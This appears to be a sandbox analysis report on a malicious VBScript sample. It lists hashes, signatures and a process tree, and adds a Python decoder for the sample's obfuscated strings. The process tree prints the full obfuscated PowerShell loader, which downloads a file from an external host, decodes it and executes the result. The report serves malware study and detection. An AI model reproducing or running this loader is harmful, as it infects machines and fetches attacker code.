Analysis
max time kernel: 145s
max time network: 147s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 04-07-2024 01:41
Static task: static1
Behavioral task: behavioral1, sample 8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59.vbs, resource win7-20240221-en
Behavioral task: behavioral2, sample 8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59.vbs, resource win10v2004-20240611-en
The signatures, process tree and memory dumps below are from behavioral1 (platform windows7_x64, resource win7-20240221-en).
General
Target: 8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59.vbs
Size: 413KB
MD5: be6f44242b4afd0e61d775b9ef7946b0
SHA1: 80ce71becc7fb1203a43708d7e3fdcad778bb79e
SHA256: 8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59
SHA512: e1778509074b9aad5fbc7de0947b887816c6f0308b4a347f181eb0dc92008125f7ef1b55184187d7c9cd99a6dfabb82ef858839cefa1185e1016ba0c3d45ba86
SSDEEP: 6144:Ps58yYxqthfv2vF5aa++uQ8YTbBrD0Dz1EhMqcwu+T7wtVuqo41SqW8ZdbU8se0s:GMZcfqHmfRpcLnkd
Malware Config
Signatures
Blocklisted process makes network request (60 IoCs)
flow     pid   process
3        2208  WScript.exe
7 to 65  2620  powershell.exe   (59 flows, one per flow id)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoC)
pid 2620  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Token: SeDebugPrivilege  pid 2620  powershell.exe
This is commonly reported for powershell.exe in sandbox runs and is weak evidence on its own; the command line below is the stronger indicator.

Suspicious use of WriteProcessMemory (6 IoCs)
PID 2208 WScript.exe    wrote to memory of 2620 powershell.exe   (reported 3 times)
PID 2620 powershell.exe wrote to memory of 2476 cmd.exe          (reported 3 times)
Each pair is a parent writing into the child it has just spawned (compare the process tree below), the normal footprint of process creation rather than injection into an unrelated process.
Processes
Each entry is the image path followed directly by the captured command line; the trailing digit is the depth in the process tree. PIDs, from the signatures above: WScript.exe 2208 → powershell.exe 2620 → cmd.exe 2476.
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin 
.nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. 
.tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. 
SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"3⤵
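The powershell.exe command line above is the whole first stage. Every string literal is a Danish word salad from which the sample's `Jimmis` function keeps one character in five (index 4 of each 5-character chunk, with the final character never read), and `Fluorideringen` is a wrapper around `iex`. The script below is an added example, written for this page rather than taken from the report or from the sample, that ports that decoder to Python so the literals can be recovered without executing any of the sample, and then checks the result against something the sandbox actually observed: the cmd.exe line at depth 3 is the decoded `$Andejagterne`. The key `stage_cmd` (the unnamed argument of the first `Fluorideringen` call), the function names `decode_all`, `check_against_observed`, `extract_stage2` and `build_constructed_carrier`, and the base64 carrier built for the test are this example's own inventions. One thing the check exposes: the report's HTML rendering collapses runs of spaces, so any literal that contained two consecutive spaces (`$Andejagterne` and the User-Agent literal `$Hoosegow` both do) decodes out of phase when copied from the page; decode those from the raw .vbs or the sandbox's command-line capture instead.

```python
import base64

# Port of the sample's own string decoder, `Jimmis`, as it appears in the
# powershell.exe command line above:
#   If (${host}.CurrentCulture) {$Fortrd++;}          -> $Fortrd == 1
#   $Jumpily = $Poria.Length - $Fortrd
#   For ($i = 4; $i -lt $Jumpily; $i += 5) { $out += $Poria.Substring($i, $Fortrd) }
# i.e. keep every 5th character starting at 0-based index 4 and stop before
# the last character, so a trailing 5-byte junk chunk contributes nothing.
def jimmis(poria: str, fortrd: int = 1) -> str:
    jumpily = len(poria) - fortrd
    return "".join(poria[i:i + fortrd] for i in range(4, jumpily, 5))


# Obfuscated literals copied from the command line above, keyed by the
# variable the sample assigns them to. "stage_cmd" is this example's name for
# the unnamed argument of the first Fluorideringen(...) call.
OBFUSCATED = {
    "$Flanconnade":   " M.liSidee Sslx.ype ",
    "$Minty":         "Mero>Jamr ",
    "$Neurocanal151": "UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ",
    "$Skumredes":     "BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocr"
                      "SvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN"
                      ".bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ",
    "stage_cmd":      "Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hap"
                      "res.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. "
                      "ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParat"
                      "CodaeIdenrUnpen kiheU.ad)Symp ",
    "$Andejagterne":  r"VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.t"
                      r"MiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo el"
                      r"Ohmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh "
                      r"Truo Ade Forbt Hyp ",
}

# The cmd.exe command line the sandbox observed (process tree above).
OBSERVED_CMD = r"echo %appdata%\Concordal6.Uds && echo t"


def decode_all(table=OBFUSCATED) -> dict:
    """Decode every literal in the table with the sample's stride-5 scheme."""
    return {name: jimmis(blob) for name, blob in table.items()}


def check_against_observed(decoded: dict) -> bool:
    """True when the recovered $Andejagterne equals the observed cmd.exe line.
    For text copied from the rendered report it is False: runs of spaces were
    collapsed, so every chunk that held two spaces is one byte short and the
    decode slips out of phase after the first such chunk."""
    return decoded["$Andejagterne"] == OBSERVED_CMD


# What the loader does with the file it downloads to %appdata%\Concordal6.Uds
# (decoded from the remaining literals of the same command line): Get-Content,
# [Convert]::FromBase64String, ASCII.GetString, then .substring(308881, 29541)
# and iex. Both constants are literal on the page ($Marmorgulvenes and
# $Renhedsgraders).
STAGE2_OFFSET = 308881
STAGE2_LENGTH = 29541


def extract_stage2(carrier_b64: str, offset: int = STAGE2_OFFSET,
                   length: int = STAGE2_LENGTH) -> str:
    # validate=False skips whitespace, as .NET's FromBase64String does.
    raw = base64.b64decode(carrier_b64, validate=False)
    # ASCII.GetString maps each non-ASCII byte to one '?'; errors="replace"
    # also yields one character per bad byte, so offsets stay aligned.
    return raw.decode("ascii", errors="replace")[offset:offset + length]


def build_constructed_carrier(payload: bytes) -> str:
    """Constructed test input (not the real download): the payload sits at
    the offset the loader reads, padded on both sides with filler bytes."""
    window = payload.ljust(STAGE2_LENGTH, b" ")
    return base64.b64encode(b"#" * STAGE2_OFFSET + window + b"#" * 4096).decode()


if __name__ == "__main__":
    decoded = decode_all()
    for name, value in decoded.items():
        print(f"{name:16} -> {value!r}")
    print("matches observed cmd.exe line:", check_against_observed(decoded))
    carrier = build_constructed_carrier(b"Write-Host 'constructed stage 2'")
    print(extract_stage2(carrier).strip())
```

Decoding the rest of the literals the same way fills in the flow between the three processes: `[Net.ServicePointManager]::SecurityProtocol` is set to Tls12; the string `$global:Nykritikkernes=New-Object System.Net.WebClien` is completed with `$Myoplastic[1]`, which is the second output line of the cmd.exe child (`echo t`), so the odd `&& echo t` exists to supply one letter that static string extraction cannot see; `$Myoplastic[0]` (the `%appdata%\Concordal6.Uds` path) becomes the download target `$tyngende`; the `User-Agent` header is set to a Firefox 121 on Windows 10 value (`$Hoosegow`); `DownloadFile` runs inside `while (!(Test-Path $tyngende))` with `Start-Sleep 4`, cycling through `$Methodizing`, which is `$Skumredes` split on `>` (a single URL in this sample); and the downloaded file is base64-decoded, windowed at offset 308881 for 29541 characters, and passed to `iex`. The 59 network flows attributed to PID 2620 above are consistent with that retry loop running for the length of the analysis.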
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads (memory dumps of PID 2620, powershell.exe; name encodes pid-sequence-start-end)
dump                                                              size
memory/2620-21-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp   4KB
memory/2620-22-0x000000001B690000-0x000000001B972000-memory.dmp   2.9MB
memory/2620-23-0x0000000001E70000-0x0000000001E78000-memory.dmp   32KB
memory/2620-24-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp   9.6MB
memory/2620-25-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp   9.6MB
memory/2620-26-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp   9.6MB
memory/2620-27-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp   9.6MB
memory/2620-28-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp   4KB
memory/2620-29-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp   9.6MB